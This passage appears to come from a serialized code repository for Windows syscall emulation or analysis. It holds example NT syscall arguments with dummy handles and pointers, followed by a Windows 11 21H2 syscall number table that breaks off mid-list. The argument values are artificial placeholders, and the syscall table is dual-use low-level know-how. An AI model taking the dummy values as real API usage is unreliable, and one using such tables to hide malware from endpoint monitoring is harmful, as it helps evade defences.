\"USHORT\",\r\n \"fieldValue\": \"0x06\",\r\n \"fieldComment\": \"June\"\r\n },\r\n {\r\n \"fieldName\": \"Day\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x01\",\r\n \"fieldComment\": \"1st\"\r\n },\r\n {\r\n \"fieldName\": \"Hour\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x00\",\r\n \"fieldComment\": \"Midnight\"\r\n },\r\n {\r\n \"fieldName\": \"Minute\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x00\",\r\n \"fieldComment\": \"00\"\r\n },\r\n {\r\n \"fieldName\": \"Second\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x00\",\r\n \"fieldComment\": \"00\"\r\n },\r\n {\r\n \"fieldName\": \"Milliseconds\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0000\",\r\n \"fieldComment\": \"0\"\r\n },\r\n {\r\n \"fieldName\": \"Weekday\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x06\",\r\n \"fieldComment\": \"Saturday\"\r\n }\r\n ]\r\n },\r\n \"struct268\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0x01D9A5B1C0000000\",\r\n \"fieldComment\": \"Time value to convert (FILETIME format, e.g., 2024-06-01 00:00:00 UTC)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtClose\": {\r\n \"ntFunc\": \"NtClose\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE Handle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtFlushBuffersFileEx\": {\r\n \"ntFunc\": \"NtFlushBuffersFileEx\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to IO_STATUS_BLOCK IoStatusBlock (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"ULONG ParametersSize (16 bytes, typical for FSCTLs)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to Parameters buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xdeadbeef\"\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ULONG Flags (example: FLUSH_FLAGS_FILE_DATA_ONLY)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000888\",\r\n \"additionalComment\": \"HANDLE FileHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtOpenProcessTokenEx\": {\r\n \"ntFunc\": \"NtOpenProcessTokenEx\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to HANDLE TokenHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000040\",\r\n \"additionalComment\": \"ULONG HandleAttributes (OBJ_CASE_INSENSITIVE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x000F01FF\",\r\n \"additionalComment\": \"ACCESS_MASK DesiredAccess (TOKEN_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtOpenThreadTokenEx\": {\r\n \"ntFunc\": \"NtOpenThreadTokenEx\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to HANDLE TokenHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000040\",\r\n \"additionalComment\": \"ULONG HandleAttributes (OBJ_CASE_INSENSITIVE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"BOOLEAN OpenAsSelf (TRUE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x000F01FF\",\r\n \"additionalComment\": \"ACCESS_MASK DesiredAccess (TOKEN_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00005555\",\r\n \"additionalComment\": \"HANDLE ThreadHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtQueryDirectoryFileEx\": {\r\n \"ntFunc\": \"NtQueryDirectoryFileEx\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PUNICODE_STRING FileName (None, query all entries)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ULONG QueryFlags (SL_RESTART_SCAN)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000005\",\r\n \"additionalComment\": \"FILE_INFORMATION_CLASS FileInformationClass (FileDirectoryInformation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"ULONG Length (4096 bytes buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to FileInformation buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to IO_STATUS_BLOCK IoStatusBlock (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID ApcContext (None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PIO_APC_ROUTINE ApcRoutine (None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE Event (None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000888\",\r\n \"additionalComment\": \"HANDLE FileHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtQueryQuotaInformationFile\": {\r\n \"ntFunc\": \"NtQueryQuotaInformationFile\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"BOOLEAN RestartScan (FALSE, typical for initial call)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PSID StartSid (None, enumerate all SIDs)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG SidListLength (0, no SID list provided)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID SidList (None, no SID list provided)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"BOOLEAN ReturnSingleEntry (FALSE, return all entries)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"ULONG Length (4096 bytes, typical buffer size)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"PVOID Buffer (dummy pointer to output buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"PIO_STATUS_BLOCK IoStatusBlock (dummy pointer)\",\r\n \"structurePointer\": \"IO_STATUS_BLOCK\",\r\n \"structureRef\": \"struct269\",\r\n \"structureValueExpectations\": \"Status and information fields for I/O result.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE FileHandle (dummy handle to open file)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct269\": {\r\n \"type\": \"IO_STATUS_BLOCK\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Status\",\r\n \"fieldType\": \"NTSTATUS\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"STATUS_SUCCESS (initial value)\"\r\n },\r\n {\r\n \"fieldName\": \"Information\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Number of bytes transferred (initial value)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtSetQuotaInformationFile\": {\r\n \"ntFunc\": \"NtSetQuotaInformationFile\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000020\",\r\n \"additionalComment\": \"ULONG Length (32 bytes, typical quota info size)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"PVOID Buffer (dummy pointer to quota info buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"PIO_STATUS_BLOCK IoStatusBlock (dummy pointer)\",\r\n \"structurePointer\": \"IO_STATUS_BLOCK\",\r\n \"structureRef\": \"struct270\",\r\n \"structureValueExpectations\": \"Status and information fields for I/O result.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE FileHandle (dummy handle to open file)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct270\": {\r\n \"type\": \"IO_STATUS_BLOCK\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Status\",\r\n \"fieldType\": \"NTSTATUS\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"STATUS_SUCCESS (initial value)\"\r\n },\r\n {\r\n \"fieldName\": \"Information\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Number of bytes transferred (initial value)\"\r\n }\r\n ]\r\n }\r\n }\r\n }\r\n}\r\n\r\n# print (syscallPossibleValues[\"NtAllocateVirtualMemory\"])" }, { "path": "start/syscall_parser_toJson.py", "content": "win11_21H2=\"\"\"SYSCALL ADDRESS FUNCTION\r\n\r\n0x02\t 00007FFBF39E3F40\tNtAcceptConnectPort\r\n0x00\t 00007FFBF39E3F00\tNtAccessCheck\r\n0x29\t 00007FFBF39E4420\tNtAccessCheckAndAuditAlarm\r\n0x63\t 00007FFBF39E4B50\tNtAccessCheckByType\r\n0x59\t 00007FFBF39E4A20\tNtAccessCheckByTypeAndAuditAlarm\r\n0x64\t 00007FFBF39E4B70\tNtAccessCheckByTypeResultList\r\n0x65\t 00007FFBF39E4B90\tNtAccessCheckByTypeResultListAndAuditAlarm\r\n0x66\t 00007FFBF39E4BB0\tNtAccessCheckByTypeResultListAndAuditAlarmByHandle\r\n0x67\t 00007FFBF39E4BD0\tNtAcquireCrossVmMutant\r\n0x68\t 00007FFBF39E4BF0\tNtAcquireProcessActivityReference\r\n0x47\t 00007FFBF39E47E0\tNtAddAtom\r\n0x110069\t 00007FFBF39E4C10\tNtAddAtomEx\r\n0x6A\t 00007FFBF39E4C30\tNtAddBootEntry\r\n0x6B\t 00007FFBF39E4C50\tNtAddDriverEntry\r\n\r\n\r\n\r\n0x6C\t 00007FFBF39E4C70\tNtAdjustGroupsToken\r\n0x41\t 00007FFBF39E4720\tNtAdjustPrivilegesToken\r\n0x6D\t 00007FFBF39E4C90\tNtAdjustTokenClaimsAndDeviceGroups\r\n0x7006E\t 00007FFBF39E4CB0\tNtAlertResumeThread\r\n0x3006F\t 00007FFBF39E4CD0\tNtAlertThread\r\n0x40070\t 00007FFBF39E4CF0\tNtAlertThreadByThreadId\r\n0x40071\t 00007FFBF39E4D10\tNtAllocateLocallyUniqueId\r\n0x72\t 00007FFBF39E4D30\tNtAllocateReserveObject\r\n0x73\t 00007FFBF39E4D50\tNtAllocateUserPhysicalPages\r\n0x74\t 00007FFBF39E4D70\tNtAllocateUserPhysicalPagesEx\r\n0x110075\t 00007FFBF39E4D90\tNtAllocateUuids\r\n0x18\t 00007FFBF39E4200\tNtAllocateVirtualMemory\r\n0x76\t 00007FFBF39E4DB0\tNtAllocateVirtualMemoryEx\r\n0x77\t 00007FFBF39E4DD0\tNtAlpcAcceptConnectPort\r\n0x78\t 00007FFBF39E4DF0\tNtAlpcCancelMessage\r\n0x79\t 00007FFBF39E4E10\tNtAlpcConnectPort\r\n0x7A\t 00007FFBF39E4E30\tNtAlpcConnectPortEx\r\n0x7B\t 00007FFBF39E4E50\tNtAlpcCreatePort\r\n0x7C\t 00007FFBF39E4E70\tNtAlpcCreatePortSection\r\n0x7D\t 00007FFBF39E4E90\tNtAlpcCreateResourceReserve\r\n0x7E\t 00007FFBF39E4EB0\tNtAlpcCreateSectionView\r\n0x7F\t 00007FFBF39E4ED0\tNtAlpcCreateSecurityContext\r\n0x80\t 00007FFBF39E4EF0\tNtAlpcDeletePortSection\r\n0x81\t 00007FFBF39E4F10\tNtAlpcDeleteResourceReserve\r\n0x82\t 00007FFBF39E4F30\tNtAlpcDeleteSectionView\r\n0x83\t 00007FFBF39E4F50\tNtAlpcDeleteSecurityContext\r\n0x84\t 00007FFBF39E4F70\tNtAlpcDisconnectPort\r\n0x85\t 00007FFBF39E4F90\tNtAlpcImpersonateClientContainerOfPort\r\n0x86\t 00007FFBF39E4FB0\tNtAlpcImpersonateClientOfPort\r\n0x87\t 00007FFBF39E4FD0\tNtAlpcOpenSenderProcess\r\n0x88\t 00007FFBF39E4FF0\tNtAlpcOpenSenderThread\r\n0x89\t 00007FFBF39E5010\tNtAlpcQueryInformation\r\n0x8A\t 00007FFBF39E5030\tNtAlpcQueryInformationMessage\r\n0x8B\t 00007FFBF39E5050\tNtAlpcRevokeSecurityContext\r\n0x8C\t 00007FFBF39E5070\tNtAlpcSendWaitReceivePort\r\n0x8D\t 00007FFBF39E5090\tNtAlpcSetInformation\r\n0x4C\t 00007FFBF39E4880\tNtApphelpCacheControl\r\n0x5008E\t 00007FFBF39E50B0\tNtAreMappedFilesTheSame\r\n0x8008F\t 00007FFBF39E50D0\tNtAssignProcessToJobObject\r\n0x90\t 00007FFBF39E50F0\tNtAssociateWaitCompletionPacket\r\n0x91\t 00007FFBF39E5110\tNtCallEnclave\r\n0x05\t 00007FFBF39E3FA0\tNtCallbackReturn\r\n0x5D\t 00007FFBF39E4A90\tNtCancelIoFile\r\n0x92\t 00007FFBF39E5130\tNtCancelIoFileEx\r\n0x93\t 00007FFBF39E5150\tNtCancelSynchronousIoFile\r\n0x70061\t 00007FFBF39E4B10\tNtCancelTimer\r\n0x94\t 00007FFBF39E5170\tNtCancelTimer2\r\n0x95\t 00007FFBF39E5190\tNtCancelWaitCompletionPacket\r\n0x96\t 00007FFBF39E51B0\tNtChangeProcessState\r\n0x97\t 00007FFBF39E51D0\tNtChangeThreadState\r\n0x3003E\t 00007FFBF39E46C0\tNtClearEvent\r\n0x3003f\t 00007FFBF39E40E0\tNtClose\r\n0x3B\t 00007FFBF39E4660\tNtCloseObjectAuditAlarm\r\n0x98\t 00007FFBF39E51F0\tNtCommitComplete\r\n0x99\t 00007FFBF39E5210\tNtCommitEnlistment\r\n0x9A\t 00007FFBF39E5230\tNtCommitRegistryTransaction\r\n0x9B\t 00007FFBF39E5250\tNtCommitTransaction\r\n0x9C\t 00007FFBF39E5270\tNtCompactKeys\r\n0x9D\t 00007FFBF39E5290\tNtCompareObjects\r\n0x9E\t 00007FFBF39E52B0\tNtCompareSigningLevels\r\n0x9F\t 00007FFBF39E52D0\tNtCompareTokens\r\n0xA0\t 00007FFBF39E52F0\tNtCompleteConnectPort\r\n0x300A1\t 00007FFBF39E5310\tNtCompressKey\r\n0xA2\t 00007FFBF39E5330\tNtConnectPort\r\n0x43\t 00007FFBF39E4760\tNtContinue\r\n0xA3\t 00007FFBF39E5350\tNtContinueEx\r\n0xA4\t 00007FFBF39E5370\tNtConvertBetweenAuxiliaryCounterAndPerformanceCounter\r\n0xA5\t 00007FFBF39E5390\tNtCreateCrossVmEvent\r\n0xA6\t 00007FFBF39E53B0\tNtCreateCrossVmMutant\r\n0xA7\t 00007FFBF39E53D0\tNtCreateDebugObject\r\n0xA8\t 00007FFBF39E53F0\tNtCreateDirectoryObject\r\n0xA9\t 00007FFBF39E5410\tNtCreateDirectoryObjectEx\r\n0xAA\t 00007FFBF39E5430\tNtCreateEnclave\r\n0xAB\t 00007FFBF39E5450\tNtCreateEnlistment\r\n0x48\t 00007FFBF39E4800\tNtCreateEvent\r\n0xAC\t 00007FFBF39E5470\tNtCreateEventPair\r\n0x55\t 00007FFBF39E49A0\tNtCreateFile\r\n0xAD\t 00007FFBF39E5490\tNtCreateIRTimer\r\n0xAE\t 00007FFBF39E54B0\tNtCreateIoCompletion\r\n0xAF\t 00007FFBF39E54D0\tNtCreateIoRing\r\n0xB0\t 00007FFBF39E54F0\tNtCreateJobObject\r\n0xB1\t 00007FFBF39E5510\tNtCreateJobSet\r\n0x1D\t 00007FFBF39E42A0\tNtCreateKey\r\n0xB2\t 00007FFBF39E5530\tNtCreateKeyTransacted\r\n0xB3\t 00007FFBF39E5550\tNtCreateKeyedEvent\r\n0xB4\t 00007FFBF39E5570\tNtCreateLowBoxToken\r\n0xB5\t 00007FFBF39E5590\tNtCreateMailslotFile\r\n0xB6\t 00007FFBF39E55B0\tNtCreateMutant\r\n0xB7\t 00007FFBF39E55D0\tNtCreateNamedPipeFile\r\n0xB8\t 00007FFBF39E55F0\tNtCreatePagingFile\r\n0xB9\t 00007FFBF39E5610\tNtCreatePartition\r\n0xBA\t 00007FFBF39E5630\tNtCreatePort\r\n0xBB\t 00007FFBF39E5650\tNtCreatePrivateNamespace\r\n0xBC\t 00007FFBF39E5670\tNtCreateProcess\r\n0x4D\t 00007FFBF39E48A0\tNtCreateProcessEx\r\n0xBD\t 00007FFBF39E5690\tNtCreateProcessStateChange\r\n0xBE\t 00007FFBF39E56B0\tNtCreateProfile\r\n0xBF\t 00007FFBF39E56D0\tNtCreateProfileEx\r\n0xC0\t 00007FFBF39E56F0\tNtCreateRegistryTransaction\r\n0xC1\t 00007FFBF39E5710\tNtCreateResourceManager\r\n0x4A\t 00007FFBF39E4840\tNtCreateSection\r\n0xC2\t 00007FFBF39E5730\tNtCreateSectionEx\r\n0xC3\t 00007FFBF39E5750\tNtCreateSemaphore\r\n0xC4\t 00007FFBF39E5770\tNtCreateSymbolicLinkObject\r\n0x4E\t 00007FFBF39E48C0\tNtCreateThread\r\n0xC5\t 00007FFBF39E5790\tNtCreateThreadEx\r\n0xC6\t 00007FFBF39E57B0\tNtCreateThreadStateChange\r\n0xC7\t 00007FFBF39E57D0\tNtCreateTimer\r\n0xC8\t 00007FFBF39E57F0\tNtCreateTimer2\r\n0xC9\t 00007FFBF39E5810\tNtCreateToken\r\n0xCA\t 00007FFBF39E5830\tNtCreateTokenEx\r\n0xCB\t 00007FFBF39E5850\tNtCreateTransaction\r\n0xCC\t 00007FFBF39E5870\tNtCreateTransactionManager\r\n0xCD\t 00007FFBF39E5890\tNtCreateUserProcess\r\n0xCE\t 00007FFBF39E58B0\tNtCreateWaitCompletionPacket\r\n0xCF\t 00007FFBF39E58D0\tNtCreateWaitablePort\r\n0xD0\t 00007FFBF39E58F0\tNtCreateWnfStateName\r\n0xD1\t 00007FFBF39E5910\tNtCreateWorkerFactory\r\n0x800D2\t 00007FFBF39E5930\tNtDebugActiveProcess\r\n0xD3\t 00007FFBF39E5950\tNtDebugContinue\r\n0x60034\t 00007FFBF39E4580\tNtDelayExecution\r\n0x400D4\t 00007FFBF39E5970\tNtDeleteAtom\r\n0xD5\t 00007FFBF39E5990\tNtDeleteBootEntry\r\n0xD6\t 00007FFBF39E59B0\tNtDeleteDriverEntry\r\n0xD7\t 00007FFBF39E59D0\tNtDeleteFile\r\n0xD8\t 00007FFBF39E59F0\tNtDeleteKey\r\n0xD9\t 00007FFBF39E5A10\tNtDeleteObjectAuditAlarm\r\n0xDA\t 00007FFBF39E5A30\tNtDeletePrivateNamespace\r\n0xDB\t 00007FFBF39E5A50\tNtDeleteValueKey\r\n0xDC\t 00007FFBF39E5A70\tNtDeleteWnfStateData\r\n0xDD\t 00007FFBF39E5A90\tNtDeleteWnfStateName\r\n0x1B0007\t 00007FFBF39E3FE0\tNtDeviceIoControlFile\r\n0xDE\t 00007FFBF39E5AB0\tNtDirectGraphicsCall\r\n0xDF\t 00007FFBF39E5AD0\tNtDisableLastKnownGood\r\n0xE0\t 00007FFBF39E5AF0\tNtDisplayString\r\n0xE1\t 00007FFBF39E5B10\tNtDrawText\r\n0x3C\t 00007FFBF39E4680\tNtDuplicateObject\r\n0x42\t 00007FFBF39E4740\tNtDuplicateToken\r\n0xE2\t 00007FFBF39E5B30\tNtEnableLastKnownGood\r\n0xE3\t 00007FFBF39E5B50\tNtEnumerateBootEntries\r\n0xE4\t 00007FFBF39E5B70\tNtEnumerateDriverEntries\r\n0x32\t 00007FFBF39E4540\tNtEnumerateKey\r\n0xE5\t 00007FFBF39E5B90\tNtEnumerateSystemEnvironmentValuesEx\r\n0xE6\t 00007FFBF39E5BB0\tNtEnumerateTransactionObject\r\n0x13\t 00007FFBF39E4160\tNtEnumerateValueKey\r\n0xE7\t 00007FFBF39E5BD0\tNtExtendSection\r\n0xE8\t 00007FFBF39E5BF0\tNtFilterBootOption\r\n0xE9\t 00007FFBF39E5C10\tNtFilterToken\r\n0xEA\t 00007FFBF39E5C30\tNtFilterTokenEx\r\n0x0A0014\t 00007FFBF39E4180\tNtFindAtom\r\n0x4B\t 00007FFBF39E4860\tNtFlushBuffersFile\r\n0xEB\t 00007FFBF39E5C50\tNtFlushBuffersFileEx\r\n0xEC\t 00007FFBF39E5C70\tNtFlushInstallUILanguage\r\n0x0C00ED\t 00007FFBF39E5C90\tNtFlushInstructionCache\r\n0x300EE\t 00007FFBF39E5CB0\tNtFlushKey\r\n0xEF\t 00007FFBF39E5CD0\tNtFlushProcessWriteBuffers\r\n0xF0\t 00007FFBF39E5CF0\tNtFlushVirtualMemory\r\n0x100F1\t 00007FFBF39E5D10\tNtFlushWriteBuffer\r\n0xF2\t 00007FFBF39E5D30\tNtFreeUserPhysicalPages\r\n0x1E\t 00007FFBF39E42C0\tNtFreeVirtualMemory\r\n0xF3\t 00007FFBF39E5D50\tNtFreezeRegistry\r\n0xF4\t 00007FFBF39E5D70\tNtFreezeTransactions\r\n0x1B0039\t 00007FFBF39E4620\tNtFsControlFile\r\n0xF5\t 00007FFBF39E5D90\tNtGetCachedSigningLevel\r\n0xF6\t 00007FFBF39E5DB0\tNtGetCompleteWnfStateSubscription\r\n0xF7\t 00007FFBF39E5DD0\tNtGetContextThread\r\n0x1900F8\t 00007FFBF39E5DF0\tNtGetCurrentProcessorNumber\r\n0xF9\t 00007FFBF39E5E10\tNtGetCurrentProcessorNumberEx\r\n0x700FA\t 00007FFBF39E5E30\tNtGetDevicePowerState\r\n0xFB\t 00007FFBF39E5E50\tNtGetMUIRegistryInfo\r\n0xFC\t 00007FFBF39E5E70\tNtGetNextProcess\r\n0xFD\t 00007FFBF39E5E90\tNtGetNextThread\r\n0xFE\t 00007FFBF39E5EB0\tNtGetNlsSectionPtr\r\n0xFF\t 00007FFBF39E5ED0\tNtGetNotificationResourceManager\r\n0x100\t 00007FFBF39E5EF0\tNtGetWriteWatch\r\n0x30101\t 00007FFBF39E5F10\tNtImpersonateAnonymousToken\r\n0x7001F\t 00007FFBF39E42E0\tNtImpersonateClientOfPort\r\n0x102\t 00007FFBF39E5F30\tNtImpersonateThread\r\n0x103\t 00007FFBF39E5F50\tNtInitializeEnclave\r\n0x104\t 00007FFBF39E5F70\tNtInitializeNlsFiles\r\n0x105\t 00007FFBF39E5F90\tNtInitializeRegistry\r\n0x110106\t 00007FFBF39E5FB0\tNtInitiatePowerAction\r\n0x8004F\t 00007FFBF39E48E0\tNtIsProcessInJob\r\n0x10107\t 00007FFBF39E5FD0\tNtIsSystemResumeAutomatic\r\n0x108\t 00007FFBF39E5FF0\tNtIsUILanguageComitted\r\n0x109\t 00007FFBF39E6010\tNtListenPort\r\n0x10A\t 00007FFBF39E6030\tNtLoadDriver\r\n0x10B\t 00007FFBF39E6050\tNtLoadEnclaveData\r\n0x10C\t 00007FFBF39E6070\tNtLoadKey\r\n0x10D\t 00007FFBF39E6090\tNtLoadKey2\r\n0x10E\t 00007FFBF39E60B0\tNtLoadKey3\r\n0x10F\t 00007FFBF39E60D0\tNtLoadKeyEx\r\n0x110\t 00007FFBF39E60F0\tNtLockFile\r\n0x50111\t 00007FFBF39E6110\tNtLockProductActivationKeys\r\n0x30112\t 00007FFBF39E6130\tNtLockRegistryKey\r\n0x113\t 00007FFBF39E6150\tNtLockVirtualMemory\r\n0x30114\t 00007FFBF39E6170\tNtMakePermanentObject\r\n0x30115\t 00007FFBF39E6190\tNtMakeTemporaryObject\r\n0x116\t 00007FFBF39E61B0\tNtManageHotPatch\r\n0x117\t 00007FFBF39E61D0\tNtManagePartition\r\n0x118\t 00007FFBF39E61F0\tNtMapCMFModule\r\n0x0A0119\t 00007FFBF39E6210\tNtMapUserPhysicalPages\r\n0x0A0003\t 00007FFBF39E3F60\tNtMapUserPhysicalPagesScatter\r\n0x28\t 00007FFBF39E4400\tNtMapViewOfSection\r\n0x11A\t 00007FFBF39E6230\tNtMapViewOfSectionEx\r\n0x11B\t 00007FFBF39E6250\tNtModifyBootEntry\r\n0x11C\t 00007FFBF39E6270\tNtModifyDriverEntry\r\n0x11D\t 00007FFBF39E6290\tNtNotifyChangeDirectoryFile\r\n0x11E\t 00007FFBF39E62B0\tNtNotifyChangeDirectoryFileEx\r\n0x11F\t 00007FFBF39E62D0\tNtNotifyChangeKey\r\n0x120\t 